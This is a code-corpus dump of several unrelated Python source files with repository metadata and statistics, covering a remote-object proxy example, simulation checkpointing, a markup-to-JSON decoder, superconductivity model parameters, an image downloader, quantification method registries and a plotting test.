| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddc91781c017fdef90c8f25f225a0256fda47415
| 828
|
py
|
Python
|
examples/main.py
|
marcoaaguiar/erised
|
26a304afb2058f532b07ecde6c6fc85d8864696c
|
[
"MIT"
] | null | null | null |
examples/main.py
|
marcoaaguiar/erised
|
26a304afb2058f532b07ecde6c6fc85d8864696c
|
[
"MIT"
] | 3
|
2021-03-15T00:51:37.000Z
|
2021-03-15T01:01:30.000Z
|
examples/main.py
|
marcoaaguiar/erised
|
26a304afb2058f532b07ecde6c6fc85d8864696c
|
[
"MIT"
] | null | null | null |
from erised.proxy import Proxy
class Dog:
def bark(self, loud: bool):
sound = "woof-woof"
if loud:
return sound.upper()
return sound
class Person:
def __init__(self, dog: Dog = None):
self.dog = dog
if __name__ == "__main__":
person = Person()
person.dog = Dog()
proxy = Proxy(obj=person)
# call method remotely
call_future = proxy.dog.bark(loud=True)
print(call_future.result())
# set attributes into remote object, even if they didn't exist originally
proxy.dog.age = 3 # it generates a future that can't be retrieved
# get attributes from remote object
get_future = proxy.dog.age.retrieve()
print(get_future.result())
# if running multiprocessing mode (local=False), terminates child process
proxy.terminate()
| 23.657143
| 77
| 0.649758
| 110
| 828
| 4.745455
| 0.545455
| 0.034483
| 0.038314
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001618
| 0.253623
| 828
| 34
| 78
| 24.352941
| 0.843042
| 0.294686
| 0
| 0
| 0
| 0
| 0.029412
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.05
| 0
| 0.35
| 0.1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddcde07c3cbd2e093fb249312865d2348a9e3b73
| 6,863
|
py
|
Python
|
proteus/MeshAdaptPUMI/Checkpoint.py
|
acatwithacomputer/proteus
|
80dfad95da6ab4d18a88a035f55c26b03540a864
|
[
"MIT"
] | null | null | null |
proteus/MeshAdaptPUMI/Checkpoint.py
|
acatwithacomputer/proteus
|
80dfad95da6ab4d18a88a035f55c26b03540a864
|
[
"MIT"
] | 13
|
2018-02-08T23:22:59.000Z
|
2020-12-06T19:40:32.000Z
|
proteus/MeshAdaptPUMI/Checkpoint.py
|
acatwithacomputer/proteus
|
80dfad95da6ab4d18a88a035f55c26b03540a864
|
[
"MIT"
] | 1
|
2020-02-17T03:25:34.000Z
|
2020-02-17T03:25:34.000Z
|
from __future__ import division
from builtins import str
from builtins import range
import proteus
import sys
import numpy
from proteus import Profiling
#it should probably be associated with the PUMI domain somehow
#The current implementation assumes we're using NS, VOF, LS, RD, MCorr setup with lagging and Backwards Euler.
#Future work on this module should include creating an abstract class from which variations based on the models and numerical accuracy can be created
#Have the dictionary submodels be labeled by physical model names like "twp_navier_stokes"
class Checkpointer:
"This class is meant to handle the checkpointing process for adapted meshes. Information that's needed to be loaded into hotstart needs to be output and then read in to be handled for data reconstruction"
def __init__(self,NSobject,frequency=10):
self.NSobject = NSobject
self.counter = 0
self.frequency = frequency
def checkpoint(self,hotStartTime):
self.transferInfo()
self.saveMesh()
modelListOld=self.EncodeModel(hotStartTime)
#pickling is apparently unsafe so we use json to try storing modelListOld
filename = "checkpointInfo"+str(self.counter)
f = open(filename, 'w')
import json
#json.dump(modelListOld.__dict__,f)
json.dump(modelListOld,f)
f.close()
def transferInfo(self):
self.NSobject.PUMI_transferFields()
def saveMesh(self):
fileName="checkpoint"+str(self.counter)+"_.smb"
self.NSobject.pList[0].domain.PUMIMesh.writeMesh(fileName)
def EncodeModel(self,hotStartTime):
"Grab only necessary components from modelListOld so far consistent only with first-order time integrator"
#def __init__(self,modelListOld,hotStartTime):
modelListOld = self.NSobject.modelListOld
saveModel = {}
saveModel["tCount"] = self.NSobject.tCount+1 #+1 just because of how indexing works in h5 file
saveModel["counter"] = self.counter
saveModel["numModels"] = len(modelListOld)
saveModel["hotStartTime"] = hotStartTime
saveModel["nAdapt"] = self.NSobject.pList[0].domain.PUMIMesh.nAdapt()
saveModel["checkpoint_status"] = ""
if(hasattr(self.NSobject,"tn") and (self.NSobject.systemStepController.t_system_last < self.NSobject.tn)):
saveModel["checkpoint_status"] = "midsystem"
saveModel["tCount"] = self.NSobject.tCount+2 #don't know how to justify this yet but it's what is needed
else:
saveModel["checkpoint_status"] = "endsystem"
saveModel["systemStepController"]=[]
controllerAttribute={}
controllerAttribute["dt_system"]=self.NSobject.systemStepController.dt_system
controllerAttribute["dt_system_fixed"]=self.NSobject.systemStepController.dt_system_fixed
controllerAttribute["t_system_last"]=self.NSobject.systemStepController.t_system_last
controllerAttribute["t_system"]=self.NSobject.systemStepController.t_system
saveModel["systemStepController"].append(controllerAttribute)
saveModel["stepController"]=[]
saveModel["timeIntegration"]=[]
saveModel["shockCapturing"]=[]
saveModel["stabilization"]=[]
for i in range(0,len(modelListOld)):
#step controller
subModel={}
subModel["dt_model"]= modelListOld[i].stepController.dt_model
subModel["t_model"] = modelListOld[i].stepController.t_model
subModel["t_model_last"] = modelListOld[i].stepController.t_model_last
subModel["substeps"]=modelListOld[i].stepController.substeps
saveModel["stepController"].append(subModel)
#time integration
subModel={}
subModel["dt"] = modelListOld[i].levelModelList[0].timeIntegration.dt
subModel["t"] = modelListOld[i].levelModelList[0].timeIntegration.t
if(hasattr(modelListOld[i].levelModelList[0].timeIntegration,'dtLast')):
subModel["dtLast"] = modelListOld[i].levelModelList[0].timeIntegration.dtLast
else:
subModel["dtLast"] = None
saveModel["timeIntegration"].append(subModel)
#shock capturing
subModel={}
if(modelListOld[i].levelModelList[0].shockCapturing is not None):
subModel["nSteps"]=modelListOld[i].levelModelList[0].shockCapturing.nSteps
subModel["nStepsToDelay"]= modelListOld[i].levelModelList[0].shockCapturing.nStepsToDelay
saveModel["shockCapturing"].append(subModel)
#Assuming the 0th model is RANS2P
#stabilization
subModel={}
subModel["nSteps"]= modelListOld[0].levelModelList[0].stabilization.nSteps
saveModel["stabilization"].append(subModel)
return saveModel
def DecodeModel(self,filename):
"create a modelListOld that can interact with the post-adapt restart capabilities"
f = open(filename, 'r')
import json
previousInfo = json.load(f)
f.close()
systemStepController = previousInfo["systemStepController"][0]
self.NSobject.systemStepController.dt_system = systemStepController["dt_system"]
self.NSobject.systemStepController.dt_system_fixed = systemStepController["dt_system_fixed"]
self.NSobject.systemStepController.t_system_last = systemStepController["t_system_last"]
self.NSobject.systemStepController.t_system = systemStepController["t_system"]
numModels = previousInfo["numModels"]
stepController=previousInfo["stepController"]
timeIntegration=previousInfo["timeIntegration"]
shockCapturing=previousInfo["shockCapturing"]
stabilization=previousInfo["stabilization"]
self.counter = previousInfo["counter"]+1
for i in range(0,numModels):
self.NSobject.modelList[i].stepController.dt_model = stepController[i]["dt_model"]
self.NSobject.modelList[i].stepController.t_model = stepController[i]["t_model"]
self.NSobject.modelList[i].stepController.t_model_last = stepController[i]["t_model_last"]
self.NSobject.modelList[i].stepController.substeps = stepController[i]["substeps"]
self.NSobject.modelList[i].levelModelList[0].timeIntegration.dt = timeIntegration[i]["dt"]
self.NSobject.modelList[i].levelModelList[0].timeIntegration.t = timeIntegration[i]["t"]
self.NSobject.modelList[i].levelModelList[0].timeIntegration.dtLast = timeIntegration[i]["dtLast"]
if(self.NSobject.modelList[i].levelModelList[0].shockCapturing is not None):
self.NSobject.modelList[i].levelModelList[0].shockCapturing.nSteps = shockCapturing[i]["nSteps"]
self.NSobject.modelList[i].levelModelList[0].shockCapturing.nStepsToDelay = shockCapturing[i]["nStepsToDelay"]
self.NSobject.modelList[0].levelModelList[0].stabilization.nSteps = stabilization[0]["nSteps"]
self.NSobject.pList[0].domain.PUMIMesh.set_nAdapt(previousInfo["nAdapt"])
| 48.673759
| 208
| 0.722862
| 741
| 6,863
| 6.605938
| 0.279352
| 0.075996
| 0.042492
| 0.044944
| 0.338304
| 0.212257
| 0.132176
| 0.039632
| 0
| 0
| 0
| 0.005961
| 0.168877
| 6,863
| 140
| 209
| 49.021429
| 0.852209
| 0.166691
| 0
| 0.093458
| 0
| 0.009346
| 0.168034
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056075
| false
| 0
| 0.084112
| 0
| 0.158879
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddd0b7f89eb5fdc6f55d6efae895022ea00e5fd2
| 2,634
|
py
|
Python
|
ream/decode.py
|
chmlee/ream-python
|
13f46596f59bb411308d1c9070b8d6f8a0afeb31
|
[
"MIT"
] | null | null | null |
ream/decode.py
|
chmlee/ream-python
|
13f46596f59bb411308d1c9070b8d6f8a0afeb31
|
[
"MIT"
] | null | null | null |
ream/decode.py
|
chmlee/ream-python
|
13f46596f59bb411308d1c9070b8d6f8a0afeb31
|
[
"MIT"
] | null | null | null |
"""
REAM: REAM Ain't Markdown
~~~~~~~~~~~~~~~~~~~~~~~~~
This file is part of the ream package
:copyright: Copyright 2020 by Chih-Ming Louis Lee
:license: MIT, see LICENSE for details
"""
import sys
import os
import re
import json
import pandas as pd
from ream.transformer import Ream2Dict
from ream.grammar import REAM_RULE
def ream2dict(input_raw, output_file=None, debug=False, no_comment=False):
"""ream to json"""
if no_comment:
Ream2Dict.no_comment = True
else:
Ream2Dict.no_comment = False
input_tree = REAM_RULE.parse(input_raw)
output_raw = Ream2Dict().transform(input_tree)
if debug:
print(input_tree)
print("====================")
print(input_tree.pretty())
print("====================")
print(output_raw)
print("====================")
if output_file is None:
return output_raw
else:
with open(output_file, 'w') as file:
json.dump(output_raw, file)
print(json.dumps(output_raw, indent=4))
return None
def ream2list(input_raw):
data = ream2dict(input_raw, no_comment=True)
def flatten(d):
parent = []
children = []
for value in d.values():
if type(value) == list:
for subentry in value:
new = flatten(subentry)
if type(new[0]) == list:
for subsub in new:
children.append(subsub)
else:
children.append(new)
else:
parent.append(value)
if children:
result = [ parent + child for child in children ]
else:
result = parent
return result
return(flatten(data))
def ream2csv(input_raw, output_file):
list_raw = ream2list(input_raw)
with open(output_file, 'w') as file:
colname = ",".join([str(x) for x in range(len(list_raw[0]))])
file.write(colname)
file.write('\n')
for entry in list_raw:
file.write(",".join(entry))
file.write('\n')
def ream2df(data):
return pd.DataFrame(ream2list(data))
def main(input_raw, output_file, debug, no_comment):
"""
main function for decoding ream file
"""
output_ext = output_file.split('.')[-1]
# choose conversion function
if output_ext in ['json']:
ream2dict(input_raw, output_file, debug, no_comment)
elif output_ext in ['csv']:
ream2csv(input_raw, output_file)
else:
print("Output file formet not supported")
print("Complete")
| 24.849057
| 74
| 0.566059
| 316
| 2,634
| 4.585443
| 0.335443
| 0.069013
| 0.057971
| 0.062112
| 0.139406
| 0.078675
| 0.078675
| 0
| 0
| 0
| 0
| 0.011432
| 0.302582
| 2,634
| 105
| 75
| 25.085714
| 0.777354
| 0.09795
| 0
| 0.185714
| 0
| 0
| 0.049425
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.085714
| false
| 0
| 0.1
| 0.014286
| 0.242857
| 0.128571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddd3332668c74ceeb6666a897a79187f953f120f
| 10,476
|
py
|
Python
|
svirl/vars/params.py
|
microsoft/svirl
|
8d0da6a03ad20315a690a3c65bb8b60c196c3f3d
|
[
"MIT"
] | 6
|
2020-12-21T20:11:13.000Z
|
2022-03-21T07:55:33.000Z
|
svirl/vars/params.py
|
ivan-sadovsky/svirl
|
523abe9fcf2a5e9d192782d7aeb7093c86ef4036
|
[
"MIT"
] | 4
|
2021-07-15T20:12:55.000Z
|
2021-08-07T22:11:18.000Z
|
svirl/vars/params.py
|
ivan-sadovsky/svirl
|
523abe9fcf2a5e9d192782d7aeb7093c86ef4036
|
[
"MIT"
] | 9
|
2020-12-22T06:06:16.000Z
|
2022-03-25T17:26:55.000Z
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import numpy as np
import svirl.config as cfg
from svirl.storage import GArray
from . import FixedVortices
class Params(object):
"""This class contains setters and getters for parameters"""
def __init__(self, mesh, vars):
self.mesh = mesh
self.vars = vars
self.fixed_vortices = FixedVortices(self.mesh, self.vars)
self.solveA = False
self.linear_coefficient = cfg.linear_coefficient # epsilon
self.gl_parameter = cfg.gl_parameter # kappa
self.normal_conductivity = cfg.normal_conductivity # sigma
# homogeneous external magnetic field
self._H = cfg.dtype(0.0)
self.homogeneous_external_field_reset = cfg.homogeneous_external_field
# x- and y- components of external vector potential for non-homogeneous external magnetic field
self.ae, self.be = None, None
# external and irregular vector potential
# it should be kept self._vpei = (self.ae, self.be) + (ai, bi)
self._vpei = None
# non-homogeneous external magnetic field
self.external_field = cfg.external_field
self.order_parameter_Langevin_coefficient = cfg.order_parameter_Langevin_coefficient
self.vector_potential_Langevin_coefficient = cfg.vector_potential_Langevin_coefficient
def __del__(self):
pass
@property
def linear_coefficient(self):
""" Sets/gets epsilon (linear coefficient)"""
if self._epsilon.size == 1:
return np.full((cfg.Nx, cfg.Ny), self._epsilon.get_h(), dtype = cfg.dtype)
else:
return self._epsilon.get_h()
@linear_coefficient.setter
def linear_coefficient(self, linear_coefficient):
if callable(linear_coefficient):
xg, yg = mesh.xy_grid
lc = linear_coefficient(xg, yg)
else:
lc = linear_coefficient
if np.isscalar(lc):
lc = lc*np.ones(1)
else:
assert lc.shape == (cfg.Nx, cfg.Ny)
self._epsilon = GArray(like = lc.astype(cfg.dtype))
def linear_coefficient_h(self):
if self._epsilon.size != 1:
return self._epsilon.get_d_obj()
return np.uintp(0)
def linear_coefficient_scalar_h(self):
if self._epsilon.size == 1:
return self._epsilon.get_h()
return cfg.dtype(0.0)
@property
def gl_parameter(self):
""" Sets/gets GL parameter"""
return self._kappa
@gl_parameter.setter
def gl_parameter(self, gl_parameter):
if gl_parameter is None or np.isnan(gl_parameter) or np.isinf(gl_parameter): gl_parameter = np.inf
assert isinstance(gl_parameter, (np.floating, float, np.integer, int)) and (np.isposinf(gl_parameter) or gl_parameter > 0.0)
self._kappa = cfg.dtype(gl_parameter)
self.solveA = np.bool(not np.isposinf(self._kappa))
def gl_parameter_squared_h(self):
if self.solveA:
return cfg.dtype(self.gl_parameter**2)
return cfg.dtype(-1.0)
@property
def normal_conductivity(self):
""" Sets/gets normal conductivity"""
return self._sigma
@normal_conductivity.setter
def normal_conductivity(self, normal_conductivity):
assert isinstance(normal_conductivity, (np.floating, float, np.integer, int)) and normal_conductivity > 0.0
self._sigma = cfg.dtype(normal_conductivity)
self._rho = cfg.dtype(1.0/normal_conductivity)
@property
def homogeneous_external_field(self):
"""
Sets/gets homogeneous external field and
does not update vector potential.
"""
return self._H
@homogeneous_external_field.setter
def homogeneous_external_field(self, homogeneous_external_field):
self._H = cfg.dtype(homogeneous_external_field)
def _update_vector_potential(self, homogeneous_external_field, reset):
assert isinstance(homogeneous_external_field, (np.floating, float, np.integer, int))
if reset:
self._H = cfg.dtype(homogeneous_external_field)
# TODO: need a fill method in GArray
# self.a.fill(0.0)
# self.b.fill(0.0)
a, b = self.vars._vp.get_vec_h()
a.fill(0.0)
b.fill(0.0)
self.vars._vp.need_htod_sync()
self.vars._vp.sync()
delta_H = self._H
else:
delta_H = - self._H
self._H = cfg.dtype(homogeneous_external_field)
delta_H += self._H
self.vars._vp.sync()
# TODO: implement GPU version of ab initialization
# Possible set of gauges, A = [g*y*H, (1-g)*x*H, 0] with any g, 0 <= g <= 1
g = 0.5
_, yg = self.mesh.xy_a_grid
xg, _ = self.mesh.xy_b_grid
a, b = self.vars._vp.get_vec_h()
a -= g * (yg - 0.5*cfg.Ly) * delta_H
b += (1.0 - g) * (xg - 0.5*cfg.Lx) * delta_H
self.vars._vp.need_htod_sync()
self.vars._vp.sync()
def _homogeneous_external_field_delta(self, homogeneous_external_field):
self._update_vector_potential(homogeneous_external_field, reset=False)
homogeneous_external_field_delta = property(
fset = _homogeneous_external_field_delta,
doc = """Sets homogeneous external field, H, and adds to the vector
potential deltaA, satisfying curl(deltaA) = deltaH, where
deltaH = H - Hold and Hold is homogeneous external field
before update.""")
def _homogeneous_external_field_reset(self, homogeneous_external_field):
self._update_vector_potential(homogeneous_external_field, reset=True)
homogeneous_external_field_reset = property(
fset = _homogeneous_external_field_reset,
doc = """Sets homogeneous external field, H, and sets vector
potential, A, satisfying curl(A) = H.""")
def _update_gvpei(self):
"""Sets self.gvpei = (self.ae, self.be) + (ai, bi).
To be executed in self.external_vector_potential and self.fixed_vortices setters."""
assert (self.ae is None) == (self.be is None)
ai, bi = None, None
if self.fixed_vortices is not None and self.fixed_vortices._vpi is not None:
ai, bi = self.fixed_vortices._vpi.get_vec_h()
assert (ai is None) == (bi is None)
vpei = None
if self.ae is not None:
if ai is not None:
vpei = (self.ae + ai, self.be + bi)
else:
vpei = (self.ae, self.be)
else:
vpei = (ai, bi)
if self._vpei is not None and vpei is None:
self._vpei.free()
self._vpei = None
else:
#TODO: easier if GArray supports like for vector storage
shapes = [vpei[0].shape, vpei[1].shape]
self._vpei = GArray(shape = shapes, dtype = cfg.dtype)
self._vpei.set_vec_h(vpei[0], vpei[1])
self._vpei.sync()
@property
def external_vector_potential(self):
"""Sets/gets external vector potential."""
assert (self.ae is None) == (self.be is None)
if self.ae is not None:
return self.ae, self.be
return None
@external_vector_potential.setter
def external_vector_potential(self, external_vector_potential):
if external_vector_potential is not None:
Ax, Ay = external_vector_potential
assert (Ax is None) == (Ay is None)
else:
Ax = None
if Ax is not None:
assert Ax.shape == (cfg.Nxa, cfg.Nya)
assert Ay.shape == (cfg.Nxb, cfg.Nyb)
self.ae = Ax
self.be = Ay
else:
self.ae, self.be = None, None
self._update_gvpei()
@property
def external_irregular_vector_potential(self):
""" Sets/gets external irregular vector potential"""
if self._vpei is not None:
return self._vpei.get_vec_h()
return None
def external_irregular_vector_potential_h(self):
if self._vpei is not None:
return self._vpei.get_d_obj()
return np.uintp(0)
@property
def external_field(self):
"""
Sets/gets external (non-homogeneous) magnetic field.
Setter accepts only a number now.
"""
# TODO: return curl(A) for non-homogeneous external_field
A = self.external_vector_potential
if A is not None:
Ax, Ay = A
# TODO: check expression below
return (- np.diff(Ax, axis=1) * cfg.idy
+ np.diff(Ay, axis=0) * cfg.idx)
else:
return None
@external_field.setter
def external_field(self, external_field):
if external_field is not None:
# NOTE: placeholder, accepts only a number now
# TODO: solve equation curl(Aext) = Hext(r) for nonuniform field Hext(r)
# Possible set of gauges, A = [g*y*H, (1-g)*x*H, 0] with any g, 0 <= g <= 1
g = 0.5
_, yg = self.mesh.xy_a_grid
xg, _ = self.mesh.xy_b_grid
Ax = - g * (yg - 0.5*cfg.Ly) * external_field
Ay = (1.0 - g) * (xg - 0.5*cfg.Lx) * external_field
self.external_vector_potential = (Ax, Ay)
else:
self.external_vector_potential = None
@property
def order_parameter_Langevin_coefficient(self):
return self._psi_langevin_c
@order_parameter_Langevin_coefficient.setter
def order_parameter_Langevin_coefficient(self, order_parameter_Langevin_coefficient):
assert isinstance(order_parameter_Langevin_coefficient, (np.floating, float, np.integer, int))
self._psi_langevin_c = cfg.dtype(order_parameter_Langevin_coefficient)
@property
def vector_potential_Langevin_coefficient(self):
return self._ab_langevin_c
@vector_potential_Langevin_coefficient.setter
def vector_potential_Langevin_coefficient(self, vector_potential_Langevin_coefficient):
assert isinstance(vector_potential_Langevin_coefficient, (np.floating, float, np.integer, int))
self._ab_langevin_c = cfg.dtype(vector_potential_Langevin_coefficient)
| 31.939024
| 132
| 0.616648
| 1,327
| 10,476
| 4.64205
| 0.146948
| 0.073864
| 0.101299
| 0.042857
| 0.388961
| 0.281818
| 0.194643
| 0.125
| 0.121104
| 0.088636
| 0
| 0.007683
| 0.29181
| 10,476
| 327
| 133
| 32.036697
| 0.822618
| 0.134212
| 0
| 0.277778
| 0
| 0
| 0.037704
| 0
| 0
| 0
| 0
| 0.009174
| 0.060606
| 1
| 0.136364
| false
| 0.005051
| 0.020202
| 0.010101
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddd3cf7e6c6e22a81fc4f44dcb742ce19a9d4e7a
| 1,570
|
py
|
Python
|
src/2_save_images.py
|
Irio/photoshopped-or-not
|
70ae1a2e7e54003d916b501f8d9e020c13ca6c98
|
[
"MIT"
] | 77
|
2016-07-13T13:36:55.000Z
|
2022-02-25T07:49:38.000Z
|
src/2_save_images.py
|
goldservice2017/FakeImageDetection
|
e7f618989d004e24444854df63d9f1c408d0463f
|
[
"MIT"
] | 1
|
2017-07-11T10:28:36.000Z
|
2017-07-11T10:28:36.000Z
|
src/2_save_images.py
|
goldservice2017/FakeImageDetection
|
e7f618989d004e24444854df63d9f1c408d0463f
|
[
"MIT"
] | 20
|
2016-10-23T14:57:19.000Z
|
2022-03-21T13:32:45.000Z
|
from hashlib import sha256
from helpers import load_dataset
import numpy as np
import os
import pandas as pd
import requests
import sys
import time
import urllib.request
CSV_PATH = sys.argv[1]
URL_COLUMN = sys.argv[2]
PATH = sys.argv[3]
def download_image(url, file_path):
try:
if 'imgur.com' in url:
final_url = requests.get(url).url
if ('//'.join(final_url.split('//')[1:])) == 'i.imgur.com/removed.png':
raise IOError('HTTP Error 404: Not Found')
urllib.request.urlretrieve(url, file_path)
print('+ %s' % url)
except IOError as e:
print('%s - %s' % (url, e), file=sys.stderr)
def url_to_file_name(url):
if url:
file_name = sha256(url.encode('utf-8')).hexdigest()
extension = url.split('.')[-1]
if len(extension) > 4:
return file_name
else:
return '%s.%s' % (file_name, extension)
if not os.path.exists(PATH):
os.mkdir(PATH)
dataset = load_dataset(CSV_PATH)
dataset[URL_COLUMN] = dataset[URL_COLUMN].astype(np.str).replace({'nan': None})
dataset['file_names'] = dataset[URL_COLUMN].map(url_to_file_name)
already_downloaded = dataset['file_names'].isin(os.listdir(PATH))
without_url = dataset[URL_COLUMN].isnull()
remaining_images = dataset[~(already_downloaded | without_url)]
print('Remaining: %i' % len(remaining_images))
for index, values in remaining_images.iterrows():
url = dict(values)[URL_COLUMN]
file_path = '%s/%s' % (PATH, url_to_file_name(url))
time.sleep(1)
download_image(url, file_path)
| 30.784314
| 83
| 0.66051
| 228
| 1,570
| 4.377193
| 0.390351
| 0.054108
| 0.064128
| 0.039078
| 0.08016
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01346
| 0.195541
| 1,570
| 50
| 84
| 31.4
| 0.776722
| 0
| 0
| 0
| 0
| 0
| 0.078981
| 0.01465
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.204545
| 0
| 0.295455
| 0.068182
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddd7b262ec09a987c21172c82cd032e817c1ba5b
| 801
|
py
|
Python
|
quapy/method/__init__.py
|
valgur/QuaPy
|
6b1ba4886a1d64b086829306cbba689cdcfd60e8
|
[
"BSD-3-Clause"
] | 34
|
2021-01-06T14:01:06.000Z
|
2022-03-08T06:59:04.000Z
|
quapy/method/__init__.py
|
valgur/QuaPy
|
6b1ba4886a1d64b086829306cbba689cdcfd60e8
|
[
"BSD-3-Clause"
] | 4
|
2021-06-07T07:45:57.000Z
|
2021-06-21T11:16:10.000Z
|
quapy/method/__init__.py
|
valgur/QuaPy
|
6b1ba4886a1d64b086829306cbba689cdcfd60e8
|
[
"BSD-3-Clause"
] | 6
|
2021-06-07T10:08:17.000Z
|
2022-03-07T13:42:15.000Z
|
from . import aggregative
from . import base
from . import meta
from . import non_aggregative
EXPLICIT_LOSS_MINIMIZATION_METHODS = {
aggregative.ELM,
aggregative.SVMQ,
aggregative.SVMAE,
aggregative.SVMKLD,
aggregative.SVMRAE,
aggregative.SVMNKLD
}
AGGREGATIVE_METHODS = {
aggregative.CC,
aggregative.ACC,
aggregative.PCC,
aggregative.PACC,
aggregative.EMQ,
aggregative.HDy,
aggregative.X,
aggregative.T50,
aggregative.MAX,
aggregative.MS,
aggregative.MS2,
} | EXPLICIT_LOSS_MINIMIZATION_METHODS
NON_AGGREGATIVE_METHODS = {
non_aggregative.MaximumLikelihoodPrevalenceEstimation
}
META_METHODS = {
meta.Ensemble,
meta.QuaNet
}
QUANTIFICATION_METHODS = AGGREGATIVE_METHODS | NON_AGGREGATIVE_METHODS | META_METHODS
| 18.627907
| 85
| 0.741573
| 78
| 801
| 7.397436
| 0.397436
| 0.069324
| 0.109185
| 0.107452
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004608
| 0.187266
| 801
| 42
| 86
| 19.071429
| 0.88172
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.121212
| 0
| 0.121212
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddd9ee0a17827daaf5df8b02b71f681e46b3a8a2
| 916
|
py
|
Python
|
OT/test_subplots.py
|
pine2104/Python_for_Lab
|
571398c2422711d8a74f9c95a746537859458557
|
[
"MIT"
] | 5
|
2022-02-03T20:10:21.000Z
|
2022-03-30T08:05:10.000Z
|
OT/test_subplots.py
|
pine2104/Python_for_Lab
|
571398c2422711d8a74f9c95a746537859458557
|
[
"MIT"
] | null | null | null |
OT/test_subplots.py
|
pine2104/Python_for_Lab
|
571398c2422711d8a74f9c95a746537859458557
|
[
"MIT"
] | null | null | null |
from EM_Algorithm.gen_gauss import gen_gauss
from EM_Algorithm.gen_poisson import gen_poisson
import numpy as np
import matplotlib.pyplot as plt
x = gen_gauss([8],[2],[1000])
y = gen_poisson([1],[1000])
fig = plt.figure(figsize=(8, 8))
# Add a gridspec with two rows and two columns and a ratio of 2 to 7 between
# the size of the marginal axes and the main axes in both directions.
# Also adjust the subplot parameters for a square plot.
gs = fig.add_gridspec(2, 2, width_ratios=(7, 2), height_ratios=(2, 7),
left=0.1, right=0.9, bottom=0.1, top=0.9,
wspace=0.05, hspace=0.05)
ax = fig.add_subplot(gs[1, 0])
ax.scatter(x, y)
ax_histx = fig.add_subplot(gs[0, 0], sharex=ax)
ax_histy = fig.add_subplot(gs[1, 1], sharey=ax)
ax_histx.hist(x, bins=10, color='grey', edgecolor="white")
ax_histy.hist(y, bins=10, orientation='horizontal', color='grey', edgecolor="white")
| 35.230769
| 84
| 0.689956
| 166
| 916
| 3.698795
| 0.46988
| 0.039088
| 0.063518
| 0.07329
| 0.052117
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059289
| 0.171397
| 916
| 25
| 85
| 36.64
| 0.749671
| 0.213974
| 0
| 0
| 0
| 0
| 0.039161
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddda6ce0c1f2ddd975f7aba52a0da244fa436a75
| 2,114
|
py
|
Python
|
code/examples/VsevolodTymofyeyev2/example.py
|
TrackerSB/MasterThesis
|
2792203d28d6c7b62f54545344ee6772d2ec5b64
|
[
"MIT"
] | null | null | null |
code/examples/VsevolodTymofyeyev2/example.py
|
TrackerSB/MasterThesis
|
2792203d28d6c7b62f54545344ee6772d2ec5b64
|
[
"MIT"
] | null | null | null |
code/examples/VsevolodTymofyeyev2/example.py
|
TrackerSB/MasterThesis
|
2792203d28d6c7b62f54545344ee6772d2ec5b64
|
[
"MIT"
] | null | null | null |
import os
from threading import Thread
from typing import List
from aiExchangeMessages_pb2 import SimulationID, TestResult
def _handle_vehicle(sid: SimulationID, vid: str, requests: List[str]) -> None:
vid_obj = VehicleID()
vid_obj.vid = vid
i = 0
while i < 3:
i += 1
print(sid.sid + ": Test status: " + service.get_status(sid))
print(vid + ": Wait")
sim_state = service.wait_for_simulator_request(sid, vid_obj) # wait()
